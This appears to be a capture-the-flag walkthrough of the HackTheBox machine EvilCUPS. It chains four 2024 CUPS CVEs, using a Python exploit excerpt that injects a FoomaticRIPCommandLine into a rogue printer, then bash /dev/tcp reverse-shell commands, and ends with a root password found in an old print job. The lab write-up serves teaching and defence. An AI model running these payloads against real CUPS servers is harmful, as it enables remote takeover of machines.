EvilCUPS is all about the recent CUPS exploits that have made a lot of news in September 2024. I’ll abuse the four recent CVEs to get remote code execution on a Linux box through cupsd. In the root step, I’ll find an old print job and recreate the PDF to see it has the root password. In Beyond Root, I’ll look at the PPD file created during the exploit path.

Box Info

Name EvilCUPS EvilCUPS
Play on HackTheBox
Release Date 02 Oct 2024
Retire Date 02 Oct 2024
OS Linux Linux
Base Points Medium [30]
First Blood User N/A (non-competitive)
First Blood Root N/A (non-competitive)
Creator ippsec



nmap finds two open TCP ports, SSH (22) and CUPS (631):

oxdf@hacky$ nmap -p- --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-30 11:24 EDT
Nmap scan report for
Host is up (0.089s latency).
Not shown: 65533 closed tcp ports (reset)
22/tcp  open  ssh
631/tcp open  ipp

Nmap done: 1 IP address (1 host up) scanned in 6.96 seconds
oxdf@hacky$ nmap -p 22,631 -sCV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-30 11:24 EDT
Nmap scan report for
Host is up (0.088s latency).

22/tcp  open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 36:49:95:03:8d:b4:4c:6e:a9:25:92:af:3c:9e:06:66 (ECDSA)
|_  256 9f:a4:a9:39:11:20:e0:96:ee:c4:9a:69:28:95:0c:60 (ED25519)
631/tcp open  ipp     CUPS 2.4
|_http-title: Home - CUPS 2.4.2
| http-robots.txt: 1 disallowed entry 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 80.10 seconds

Based on the OpenSSH version, the host is likely running Debian 12 bookworm.

Seeing CUPS (Common Unix Printing System), I’ll check UDP as well, and it’s likely open:

oxdf@hacky$ nmap -sU -p 631
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-30 11:28 EDT
Nmap scan report for
Host is up (0.090s latency).

631/udp open|filtered ipp

Nmap done: 1 IP address (1 host up) scanned in 1.13 seconds

CUPS - TCP 631

On TCP, CUPS offers a web GUI to manage printers:


It’s running CUPS version 2.4.2, and the Copyright at the bottom shows 2021-2022.

On the “Printers” tab, there’s one printer installed:


The page for the printer shows options for administrating it:


At the bottom, there are no active jobs, but there are some completed ones:


The page for “Administration” (/admin) returns 403 Forbidden:


Shell as lp


On 26 September 2024 (a bit more than a week before EvilCups released), a researcher who goes by evilsocket released research about vulnerabilities in CUPs. It includes four CVEs:

  • CVE-2024-47176 - cups-browsed, the service that typically listens on all interfaces UDP 631, is what allows adding a printer to a machine remotely. This vulnerability allows any attacker who can reach this machine to trigger a “Get-Printer-Attributes” Internet Printing Protocol (IPP) request being sent to an attacker-controlled URL. This was patched by just disabling cups-browsed as it’s not really the best way to get this functionality any more.
  • CVE-2024-47076 - libcupsfilters is responsible for handling the IPP attributes returned from the request. These are written to a temporary Postscript Printer Description (PPD) file without sanitization, allowing malicious attributes to be written.
  • CVE-2024-47175 - libppd is responsible for reading a temporary PPD file and turning that into a printer object on the system. It also doesn’t sanitize when reading, allowing for injection of attacker controlled data.
  • CVE-2024-47177 - This vulnerability in cups-filters allows for loading a printer using the foomatic-rip print filter, which is a universal converter for transforming PostScript or PDF data into the format that the printer can understand. It has long had issues with command injection, and has been limited to manual installs / configurations only.

Combining these four vulnerabilities, I can add a malicious printer to a system remotely and then when it prints a page, the vulnerability will trigger and run my command.

Create Evil Printer

POC Analysis

The box’s author, IppSec, has a script to exploit this (built from the POCs that are out there already, but with improved stability). The __main__ function gives a good overview of what the script does:

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("%s <LOCAL_HOST> <TARGET_HOST> <COMMAND>" % sys.argv[0])

    SERVER_HOST = sys.argv[1]
    SERVER_PORT = 12345

    command = sys.argv[3]

    server = IPPServer((SERVER_HOST, SERVER_PORT),
                       IPPRequestHandler, MaliciousPrinter(command))

        args=(server, )

    TARGET_HOST = sys.argv[2]
    TARGET_PORT = 631

    print("Please wait this normally takes 30 seconds...")

    seconds = 0
    while True:
        print(f"\r{seconds} elapsed", end="", flush=True)
        seconds += 1

It starts an IPP server hosting information about a malicious printer. Then it sends a browsed packet to trigger the request, and

The browse packet is built off the specification here:

def send_browsed_packet(ip, port, ipp_server_host, ipp_server_port):
    print(f"Sending udp packet to {ip}:{port}...")

    # Get a random number between 0 and 100
    printer_type = 2
    printer_state = '3'
    printer_uri = f'http://{ipp_server_host}:{ipp_server_port}/printers/EVILCUPS'
    printer_location = '"You Have Been Hacked"'
    printer_info = '"HACKED"'
    printer_model = '"HP LaserJet 1020"'
    packet = f"{printer_type:x} {printer_state} {printer_uri} {printer_location} {printer_info} {printer_model} \n"

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.sendto(packet.encode('utf-8'), (ip, port))

def run_server(server):
    with ServerContext(server):
            while True:
        except KeyboardInterrupt:


This is sending a UDP packet to the CUPs port to trigger an IPP request back to me.

The MaliciousPrinter class is mostly a set of normal attributes except the last one, which is where the injection happens:

class MaliciousPrinter(behaviour.StatelessPrinter):
    def __init__(self, command):
        self.command = command
        super(MaliciousPrinter, self).__init__()
    def printer_list_attributes(self):
        attr = {
            # rfc2911 section 4.4
            ): [self.printer_uri],
            ): [f'"\n*FoomaticRIPCommandLine: "{self.command}"\n*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip'.encode()],

The data starts with a newline, and then adds a FoomaticRIPCommandLine with the desired command.

Add Printer

Typically I liked to test POCs using simple payloads at first. Given that this POC will create a printer that I can’t delete, I’m going to try to just start with a shell. I’ll run the POC, and it sends the UDP packet:

oxdf@hacky$ python evil-cups.py 'bash -c "bash -i >& /dev/tcp/ 0>&1"'
IPP Server Listening on ('', 12345)
Sending udp packet to
Please wait this normally takes 30 seconds...
2 elapsed 

A better shell to send would be nohup bash -c "bash -i >& /dev/tcp/ 0>&1"&', as this will start the shell as a new process in the background. Otherwise, the shell dies every 5-10 minutes when the printer crashes for not being a real printer and gets cleaned up.

There’s a hang where it says it takes 30 seconds to respond, with a counter. After 29, the target connects and it sends the printer payload:

29 elapsed
target connected, sending payload ...

target connected, sending payload ...

At this point, the printer shows up on the CUPs TCP webserver:


Trigger RCE

From the page for the printer, one of the “Maintenance” options is to “Print Test Page”, which I’ll select:


As soon as I do, I get a shell:

oxdf@hacky$ nc -lnvp 443
Listening on 443
Connection received on 56432
bash: cannot set terminal process group (1358): Inappropriate ioctl for device
bash: no job control in this shell

I’ll upgrade my shell:

lp@evilcups:/$ script /dev/null -c bash
script /dev/null -c bash
Script started, output log file is '/dev/null'.
lp@evilcups:/$ ^Z
[1]+  Stopped                 nc -lnvp 443
oxdf@hacky$ stty raw -echo; fg
nc -lnvp 443
reset: unknown terminal type unknown
Terminal type? screen

I’ll find user.txt world-readable in /home/htb/:

lp@evilcups:/home/htb$ cat user.txt

Shell as root


Home Directories

There is one user on the box, htb:

lp@evilcups:/home$ ls -l
total 4
drwxrwx--- 3 htb lp 4096 Sep 30 13:04 htb

Interestingly, lp has full access. There’s nothing useful beyond the flag here.

The same user has a shell set in passwd:

lp@evilcups:~$ cat /etc/passwd | grep "sh$"

The lp user’s home directory is /var/spool/cups/tmp:

lp@evilcups:~$ pwd

It’s very empty:

lp@evilcups:~$ ls -la
total 8
drwxrwx--T 2 root lp 4096 Sep 30 13:21 .
drwx--x--- 3 root lp 4096 Sep 30 13:21 ..
-rw------- 1 lp   lp    0 Sep 30 11:50 cups-dbus-notifier-lockfile

I noted above that there were three previous print jobs. This CUPS documentation describes the location of “Job Files” as /var/spool/cups. Unfortunately, lp can’t list this directory:

lp@evilcups:/var/spool$ ls -ld cups
drwx--x--- 3 root lp 4096 Sep 30 13:21 cups

However, the same docs show the filename format as D[5 digit int]-100. I can see if the file associated with a job is there, and it is:

lp@evilcups:/var/spool/cups$ cat d00001-001
%%BoundingBox: 18 36 577 806
%%Title: Enscript Output
%%Creator: GNU Enscript
%%CreationDate: Sat Sep 28 09:31:01 2024
%%Orientation: Portrait
%%Pages: (atend)
%%DocumentMedia: A4 595 842 0 () ()
%%DocumentNeededResources: (atend)
%%BeginResource: procset Enscript-Prolog 1.6.5 90
% Procedures.

/_S {   % save current state
  /_s save def
} def
/_R {   % restore from saved state
  _s restore
} def

/S {    % showpage protecting gstate
} bind def

/MF {   % fontname newfontname -> -     make a new encoded font
  /newfontname exch def
  /fontname exch def

  /fontdict fontname findfont def
  /newfont fontdict maxlength dict def

  fontdict {
    dup /FID eq {
      % skip FID pair
      pop pop
    } {
      % copy to the new font dictionary
      exch newfont 3 1 roll put
    } ifelse
  } forall

  newfont /FontName newfontname put

  % insert only valid encoding vectors
  encoding_vector length 256 eq {
    newfont /Encoding encoding_vector put
  } if

  newfontname newfont definefont pop
} def

/MF_PS { % fontname newfontname -> -    make a new font preserving its enc
  /newfontname exch def
  /fontname exch def

  /fontdict fontname findfont def
  /newfont fontdict maxlength dict def

  fontdict {
    dup /FID eq {
      % skip FID pair
      pop pop
    } {
      % copy to the new font dictionary
      exch newfont 3 1 roll put
    } ifelse
  } forall

  newfont /FontName newfontname put

  newfontname newfont definefont pop
} def

/SF { % fontname width height -> -      set a new font
  /height exch def
  /width exch def

  [width 0 0 height 0 0] makefont setfont
} def

/SUF { % fontname width height -> -     set a new user font
  /height exch def
  /width exch def

  /F-gs-user-font MF
  /F-gs-user-font width height SF
} def

/SUF_PS { % fontname width height -> -  set a new user font preserving its enc
  /height exch def
  /width exch def

  /F-gs-user-font MF_PS
  /F-gs-user-font width height SF
} def

/M {moveto} bind def
/s {show} bind def

/Box {  % x y w h -> -                  define box path
  /d_h exch def /d_w exch def /d_y exch def /d_x exch def
  d_x d_y  moveto
  d_w 0 rlineto
  0 d_h rlineto
  d_w neg 0 rlineto
} def

/bgs {  % x y height blskip gray str -> -       show string with bg color
  /str exch def
  /gray exch def
  /blskip exch def
  /height exch def
  /y exch def
  /x exch def

    x y blskip sub str stringwidth pop height Box
    gray setgray
  x y M str s
} def

/bgcs { % x y height blskip red green blue str -> -  show string with bg color
  /str exch def
  /blue exch def
  /green exch def
  /red exch def
  /blskip exch def
  /height exch def
  /y exch def
  /x exch def

    x y blskip sub str stringwidth pop height Box
    red green blue setrgbcolor
  x y M str s
} def

% Highlight bars.
/highlight_bars {       % nlines lineheight output_y_margin gray -> -
    /ymarg exch def
    /lineheight exch def
    /nlines exch def

    % This 2 is just a magic number to sync highlight lines to text.
    0 d_header_y ymarg sub 2 sub translate

    /cw d_output_w cols div def
    /nrows d_output_h ymarg 2 mul sub lineheight div cvi def

    % for each column
    0 1 cols 1 sub {
      cw mul /xp exch def

      % for each rows
      0 1 nrows 1 sub {
        /rn exch def
        rn lineheight mul neg /yp exch def
        rn nlines idiv 2 mod 0 eq {
          % Draw highlight bar.  4 is just a magic indentation.
          xp 4 add yp cw 8 sub lineheight neg Box fill
        } if
      } for
    } for

} def

% Line highlight bar.
/line_highlight {       % x y width height gray -> -
    /gray exch def
    Box gray setgray fill
} def

% Column separator lines.
/column_lines {
    .1 setlinewidth
    0 d_footer_h translate
    /cw d_output_w cols div def
    1 1 cols 1 sub {
      cw mul 0 moveto
      0 d_output_h rlineto stroke
    } for
} def

% Column borders.
/column_borders {
    .1 setlinewidth
    0 d_footer_h moveto
    0 d_output_h rlineto
    d_output_w 0 rlineto
    0 d_output_h neg rlineto
    closepath stroke
} def

% Do the actual underlay drawing
/draw_underlay {
  ul_style 0 eq {
    ul_str true charpath stroke
  } {
    ul_str show
  } ifelse
} def

% Underlay
/underlay {     % - -> -
    0 d_page_h translate
    d_page_h neg d_page_w atan rotate

    ul_gray setgray
    ul_font setfont
    /dw d_page_h dup mul d_page_w dup mul add sqrt def
    ul_str stringwidth pop dw exch sub 2 div ul_h_ptsize -2 div moveto
} def

/user_underlay {        % - -> -
    ul_x ul_y translate
    ul_angle rotate
    ul_gray setgray
    ul_font setfont
    0 0 ul_h_ptsize 2 div sub moveto
} def

% Page prefeed
/page_prefeed {         % bool -> -
  statusdict /prefeed known {
    statusdict exch /prefeed exch put
  } {
  } ifelse
} def

% Wrapped line markers
/wrapped_line_mark {    % x y charwith charheight type -> -
  /type exch def
  /h exch def
  /w exch def
  /y exch def
  /x exch def

  type 2 eq {
    % Black boxes (like TeX does)
      0 setlinewidth
      x w 4 div add y M
      0 h rlineto w 2 div 0 rlineto 0 h neg rlineto
      closepath fill
  } {
    type 3 eq {
      % Small arrows
        .2 setlinewidth
        x w 2 div add y h 2 div add M
        w 4 div 0 rlineto
        x w 4 div add y lineto stroke

        x w 4 div add w 8 div add y h 4 div add M
        x w 4 div add y lineto
        w 4 div h 8 div rlineto stroke
    } {
      % do nothing
    } ifelse
  } ifelse
} def

% EPSF import.

/BeginEPSF {
  /b4_Inc_state save def                % Save state for cleanup
  /dict_count countdictstack def        % Count objects on dict stack
  /op_count count 1 sub def             % Count objects on operand stack
  userdict begin
  /showpage { } def
  0 setgray 0 setlinecap
  1 setlinewidth 0 setlinejoin
  10 setmiterlimit [ ] 0 setdash newpath
  /languagelevel where {
    pop languagelevel
    1 ne {
      false setstrokeadjust false setoverprint
    } if
  } if
} bind def

/EndEPSF {
  count op_count sub { pos } repeat     % Clean up stacks
  countdictstack dict_count sub { end } repeat
  b4_Inc_state restore
} bind def

% Check PostScript language level.
/languagelevel where {
  pop /gs_languagelevel languagelevel def
} {
  /gs_languagelevel 1 def
} ifelse
%%BeginResource: procset Enscript-Encoding-88591 1.6.5 90
/encoding_vector [
/.notdef        /.notdef        /.notdef        /.notdef
/.notdef        /.notdef        /.notdef        /.notdef
/.notdef        /.notdef        /.notdef        /.notdef
/.notdef        /.notdef        /.notdef        /.notdef
/.notdef        /.notdef        /.notdef        /.notdef
/.notdef        /.notdef        /.notdef        /.notdef
/.notdef        /.notdef        /.notdef        /.notdef
/.notdef        /.notdef        /.notdef        /.notdef
/space          /exclam         /quotedbl       /numbersign
/dollar         /percent        /ampersand      /quoteright
/parenleft      /parenright     /asterisk       /plus
/comma          /hyphen         /period         /slash
/zero           /one            /two            /three
/four           /five           /six            /seven
/eight          /nine           /colon          /semicolon
/less           /equal          /greater        /question
/at             /A              /B              /C
/D              /E              /F              /G
/H              /I              /J              /K
/L              /M              /N              /O
/P              /Q              /R              /S
/T              /U              /V              /W
/X              /Y              /Z              /bracketleft
/backslash      /bracketright   /asciicircum    /underscore
/quoteleft      /a              /b              /c
/d              /e              /f              /g
/h              /i              /j              /k
/l              /m              /n              /o
/p              /q              /r              /s
/t              /u              /v              /w
/x              /y              /z              /braceleft
/bar            /braceright     /tilde          /.notdef
/.notdef        /.notdef        /.notdef        /.notdef
/.notdef        /.notdef        /.notdef        /.notdef
/.notdef        /.notdef        /.notdef        /.notdef
/.notdef        /.notdef        /.notdef        /.notdef
/.notdef        /.notdef        /.notdef        /.notdef
/.notdef        /.notdef        /.notdef        /.notdef
/.notdef        /.notdef        /.notdef        /.notdef
/.notdef        /.notdef        /.notdef        /.notdef
/space          /exclamdown     /cent           /sterling
/currency       /yen            /brokenbar      /section
/dieresis       /copyright      /ordfeminine    /guillemotleft
/logicalnot     /hyphen         /registered     /macron
/degree         /plusminus      /twosuperior    /threesuperior
/acute          /mu             /paragraph      /bullet
/cedilla        /onesuperior    /ordmasculine   /guillemotright
/onequarter     /onehalf        /threequarters  /questiondown
/Agrave         /Aacute         /Acircumflex    /Atilde
/Adieresis      /Aring          /AE             /Ccedilla
/Egrave         /Eacute         /Ecircumflex    /Edieresis
/Igrave         /Iacute         /Icircumflex    /Idieresis
/Eth            /Ntilde         /Ograve         /Oacute
/Ocircumflex    /Otilde         /Odieresis      /multiply
/Oslash         /Ugrave         /Uacute         /Ucircumflex
/Udieresis      /Yacute         /Thorn          /germandbls
/agrave         /aacute         /acircumflex    /atilde
/adieresis      /aring          /ae             /ccedilla
/egrave         /eacute         /ecircumflex    /edieresis
/igrave         /iacute         /icircumflex    /idieresis
/eth            /ntilde         /ograve         /oacute
/ocircumflex    /otilde         /odieresis      /divide
/oslash         /ugrave         /uacute         /ucircumflex
/udieresis      /yacute         /thorn          /ydieresis
] def
%%IncludeResource: font Courier-Bold
%%IncludeResource: font Courier
/HFpt_w 10 def
/HFpt_h 10 def
/Courier-Bold /HF-gs-font MF
/HF /HF-gs-font findfont [HFpt_w 0 0 HFpt_h 0 0] makefont def
/Courier /F-gs-font MF
/F-gs-font 10 10 SF
/#copies 1 def
% Pagedevice definitions:
gs_languagelevel 1 gt {
    /PageSize [595 842]
  >> setpagedevice
} if
%%BeginResource: procset Enscript-Header-simple 1.6.5 90

/do_header {    % print default simple header
    d_header_x d_header_y HFpt_h 3 div add translate

    HF setfont
    user_header_p {
      5 0 moveto user_header_left_str show

      d_header_w user_header_center_str stringwidth pop sub 2 div
      0 moveto user_header_center_str show

      d_header_w user_header_right_str stringwidth pop sub 5 sub
      0 moveto user_header_right_str show
    } {
      5 0 moveto fname show
      45 0 rmoveto fmodstr show
      45 0 rmoveto pagenumstr show
    } ifelse

} def
/d_page_w 559 def
/d_page_h 770 def
/d_header_x 0 def
/d_header_y 755 def
/d_header_w 559 def
/d_header_h 15 def
/d_footer_x 0 def
/d_footer_y 0 def
/d_footer_w 559 def
/d_footer_h 0 def
/d_output_w 559 def
/d_output_h 755 def
/cols 1 def
%%Page: (1) 1
18 36 translate
/pagenum 1 def
/fname (pass.txt) def
/fdir (.) def
/ftail (pass.txt) def
% User defined strings:
/fmodstr (Sat Sep 28 09:30:10 2024) def
/pagenumstr (1) def
/user_header_p false def
/user_footer_p false def
5 742 M
(Br3@k-G!@ss-r00t-evilcups) s
%%Pages: 1
%%DocumentNeededResources: font Courier-Bold Courier

Create PDF

The password is visible in plaintext in the file, but it’s more fun to create a visible image of what was printed. I’ll take that file and save a copy on my host. I’ll use ps2pdf to generate a PDF:

oxdf@hacky$ ps2pdf d00001-001 d00001-001.pdf

And then open the resulting PDF:


It’s a pass.txt file, with a password!


That password works with su to get a root shell:

lp@evilcups:/var/spool/cups$ su -

And grab root.txt:

root@evilcups:~# cat root.txt

Beyond Root

When I create a printer over cups-browsed like this, it reached out over IPP to the given URL. The resulting attributes are saved as a .ppd file, which is located in /etc/cups/ppd named after the printer name:

root@evilcups:/etc/cups/ppd# ls
root@evilcups:/etc/cups/ppd# cat HACKED_10_10_14_6.ppd
*PPD-Adobe: "4.3"
*APRemoteQueueID: ""
*FormatVersion: "4.3"
*FileVersion: "1.28.17"
*LanguageVersion: English
*LanguageEncoding: ISOLatin1
*PSVersion: "(3010.000) 0"
*LanguageLevel: "3"
*FileSystem: False
*PCFileName: "drvless.ppd"
*Manufacturer: "HP"
*ModelName: "HP 0.00"
*Product: "(HP 0.00)"
*NickName: "HP 0.00, driverless, cups-filters 1.28.17"
*ShortNickName: "HP 0.00"
*DefaultOutputOrder: Normal
*ColorDevice: True
*cupsVersion: 2.4
*cupsSNMPSupplies: False
*cupsLanguages: "en"
*APSupplies: ""
*FoomaticRIPCommandLine: "bash -c "bash -i >& /dev/tcp/ 0>&1""
*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip"
*cupsFilter2: "application/vnd.cups-pdf application/pdf 200 -"
*% Printer did not supply page size info via IPP, using defaults
*OpenUI *PageSize/Media Size: PickOne
*OrderDependency: 10 AnySetup *PageSize
*DefaultPageSize: Letter
*PageSize Letter/US Letter: "<</PageSize[612 792]>>setpagedevice"
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*PageSize B5/JIS B5: "<</PageSize[516 729]>>setpagedevice"
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*PageSize EnvC5/Envelope C5: "<</PageSize[459 649]>>setpagedevice"
*PageSize EnvDL/Envelope DL: "<</PageSize[312 624]>>setpagedevice"
*PageSize EnvMonarch/Envelope Monarch: "<</PageSize[279 540]>>setpagedevice"
*CloseUI: *PageSize
*OpenUI *PageRegion/Media Size: PickOne
*OrderDependency: 10 AnySetup *PageRegion
*DefaultPageRegion: Letter
*PageRegion Letter/US Letter: "<</PageSize[612 792]>>setpagedevice"
*PageRegion Legal/US Legal: "<</PageSize[612 1008]>>setpagedevice"
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The important line is:

*FoomaticRIPCommandLine: "bash -c "bash -i >& /dev/tcp/ 0>&1""

When it prints, it will run my reverse shell.

Just above it, there’s an empty parameter:

*APSupplies: ""
*FoomaticRIPCommandLine: "bash -c "bash -i >& /dev/tcp/ 0>&1""

That’s likely from the newline injection I mentioned above:

            ): [f'"\n*FoomaticRIPCommandLine: "{self.command}"\n*cupsFilter2 : "application/pdf application/vnd.cups-postscript 0 foomatic-rip'.encode()],

printer-more-info must translate into the APSupplies attribute in the .ppd file, and then the new line starts the FoomaticRIPCommandLine.